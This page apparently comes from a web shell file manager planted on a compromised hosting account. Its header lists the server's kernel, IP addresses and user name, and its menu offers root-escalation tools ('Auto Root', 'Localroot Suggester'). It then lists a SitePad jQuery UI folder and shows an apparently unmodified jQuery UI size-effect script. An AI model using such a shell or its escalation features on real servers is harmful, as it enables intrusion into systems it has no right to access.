Linux amd.servercpanel.com 5.14.0-570.25.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 9 04:57:09 EDT 2025 x86_64
LiteSpeed
Server IP : 161.248.188.165 & Your IP : 216.73.216.219
Domains :
Cant Read [ /etc/named.conf ]
User : oishifashion
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
local /
sitepad /
editor /
site-inc /
js /
jquery /
ui /
Delete
Unzip
Name
Size
Permission
Date
Action
accordion.min.js
8.38
KB
-rw-r--r--
2025-11-28 07:18
autocomplete.min.js
8.09
KB
-rw-r--r--
2025-11-28 07:18
button.min.js
7.07
KB
-rw-r--r--
2025-11-28 07:18
core.min.js
3.91
KB
-rw-r--r--
2025-11-28 07:18
datepicker.min.js
35.65
KB
-rw-r--r--
2025-11-28 07:18
dialog.min.js
11.85
KB
-rw-r--r--
2025-11-28 07:18
draggable.min.js
18.46
KB
-rw-r--r--
2025-11-28 07:18
droppable.min.js
6.12
KB
-rw-r--r--
2025-11-28 07:18
effect-blind.min.js
1.11
KB
-rw-r--r--
2025-11-28 07:18
effect-bounce.min.js
1.22
KB
-rw-r--r--
2025-11-28 07:18
effect-clip.min.js
918
B
-rw-r--r--
2025-11-28 07:18
effect-drop.min.js
997
B
-rw-r--r--
2025-11-28 07:18
effect-explode.min.js
1.15
KB
-rw-r--r--
2025-11-28 07:18
effect-fade.min.js
515
B
-rw-r--r--
2025-11-28 07:18
effect-fold.min.js
1.01
KB
-rw-r--r--
2025-11-28 07:18
effect-highlight.min.js
789
B
-rw-r--r--
2025-11-28 07:18
effect-puff.min.js
783
B
-rw-r--r--
2025-11-28 07:18
effect-pulsate.min.js
798
B
-rw-r--r--
2025-11-28 07:18
effect-scale.min.js
1.1
KB
-rw-r--r--
2025-11-28 07:18
effect-shake.min.js
1.08
KB
-rw-r--r--
2025-11-28 07:18
effect-size.min.js
3.27
KB
-rw-r--r--
2025-11-28 07:18
effect-slide.min.js
962
B
-rw-r--r--
2025-11-28 07:18
effect-transfer.min.js
857
B
-rw-r--r--
2025-11-28 07:18
effect.min.js
13.11
KB
-rw-r--r--
2025-11-28 07:18
menu.min.js
9.38
KB
-rw-r--r--
2025-11-28 07:18
mouse.min.js
3.07
KB
-rw-r--r--
2025-11-28 07:18
position.min.js
6.37
KB
-rw-r--r--
2025-11-28 07:18
progressbar.min.js
2.41
KB
-rw-r--r--
2025-11-28 07:18
resizable.min.js
17.99
KB
-rw-r--r--
2025-11-28 07:18
selectable.min.js
4.16
KB
-rw-r--r--
2025-11-28 07:18
selectmenu.min.js
8.19
KB
-rw-r--r--
2025-11-28 07:18
slider.min.js
10.73
KB
-rw-r--r--
2025-11-28 07:18
sortable.min.js
24.32
KB
-rw-r--r--
2025-11-28 07:18
spinner.min.js
6.94
KB
-rw-r--r--
2025-11-28 07:18
tabs.min.js
11.83
KB
-rw-r--r--
2025-11-28 07:18
tooltip.min.js
5.57
KB
-rw-r--r--
2025-11-28 07:18
widget.min.js
6.75
KB
-rw-r--r--
2025-11-28 07:18
Save
Rename
/*! * jQuery UI Effects Size 1.11.4 * http://jqueryui.com * * Copyright jQuery Foundation and other contributors * Released under the MIT license. * http://jquery.org/license * * http://api.jqueryui.com/size-effect/ */ !function(a){"function"==typeof define&&define.amd?define(["jquery","./effect"],a):a(jQuery)}(function(a){return a.effects.effect.size=function(b,c){var d,e,f,g=a(this),h=["position","top","bottom","left","right","width","height","overflow","opacity"],i=["position","top","bottom","left","right","overflow","opacity"],j=["width","height","overflow"],k=["fontSize"],l=["borderTopWidth","borderBottomWidth","paddingTop","paddingBottom"],m=["borderLeftWidth","borderRightWidth","paddingLeft","paddingRight"],n=a.effects.setMode(g,b.mode||"effect"),o=b.restore||"effect"!==n,p=b.scale||"both",q=b.origin||["middle","center"],r=g.css("position"),s=o?h:i,t={height:0,width:0,outerHeight:0,outerWidth:0};"show"===n&&g.show(),d={height:g.height(),width:g.width(),outerHeight:g.outerHeight(),outerWidth:g.outerWidth()},"toggle"===b.mode&&"show"===n?(g.from=b.to||t,g.to=b.from||d):(g.from=b.from||("show"===n?t:d),g.to=b.to||("hide"===n?t:d)),f={from:{y:g.from.height/d.height,x:g.from.width/d.width},to:{y:g.to.height/d.height,x:g.to.width/d.width}},"box"!==p&&"both"!==p||(f.from.y!==f.to.y&&(s=s.concat(l),g.from=a.effects.setTransition(g,l,f.from.y,g.from),g.to=a.effects.setTransition(g,l,f.to.y,g.to)),f.from.x!==f.to.x&&(s=s.concat(m),g.from=a.effects.setTransition(g,m,f.from.x,g.from),g.to=a.effects.setTransition(g,m,f.to.x,g.to))),"content"!==p&&"both"!==p||f.from.y!==f.to.y&&(s=s.concat(k).concat(j),g.from=a.effects.setTransition(g,k,f.from.y,g.from),g.to=a.effects.setTransition(g,k,f.to.y,g.to)),a.effects.save(g,s),g.show(),a.effects.createWrapper(g),g.css("overflow","hidden").css(g.from),q&&(e=a.effects.getBaseline(q,d),g.from.top=(d.outerHeight-g.outerHeight())*e.y,g.from.left=(d.outerWidth-g.outerWidth())*e.x,g.to.top=(d.outerHeight-g.to.outerHeight)*e.y,g.to.left=(d.outerWidth-g.to.outerWidth)*e.x),g.css(g.from),"content"!==p&&"both"!==p||(l=l.concat(["marginTop","marginBottom"]).concat(k),m=m.concat(["marginLeft","marginRight"]),j=h.concat(l).concat(m),g.find("*[width]").each(function(){var c=a(this),d={height:c.height(),width:c.width(),outerHeight:c.outerHeight(),outerWidth:c.outerWidth()};o&&a.effects.save(c,j),c.from={height:d.height*f.from.y,width:d.width*f.from.x,outerHeight:d.outerHeight*f.from.y,outerWidth:d.outerWidth*f.from.x},c.to={height:d.height*f.to.y,width:d.width*f.to.x,outerHeight:d.height*f.to.y,outerWidth:d.width*f.to.x},f.from.y!==f.to.y&&(c.from=a.effects.setTransition(c,l,f.from.y,c.from),c.to=a.effects.setTransition(c,l,f.to.y,c.to)),f.from.x!==f.to.x&&(c.from=a.effects.setTransition(c,m,f.from.x,c.from),c.to=a.effects.setTransition(c,m,f.to.x,c.to)),c.css(c.from),c.animate(c.to,b.duration,b.easing,function(){o&&a.effects.restore(c,j)})})),g.animate(g.to,{queue:!1,duration:b.duration,easing:b.easing,complete:function(){0===g.to.opacity&&g.css("opacity",g.from.opacity),"hide"===n&&g.hide(),a.effects.restore(g,s),o||("static"===r?g.css({position:"relative",top:g.to.top,left:g.to.left}):a.each(["top","left"],function(a,b){g.css(b,function(b,c){var d=parseInt(c,10),e=a?g.to.left:g.to.top;return"auto"===c?e+"px":d+e+"px"})})),a.effects.removeWrapper(g),c()}})}});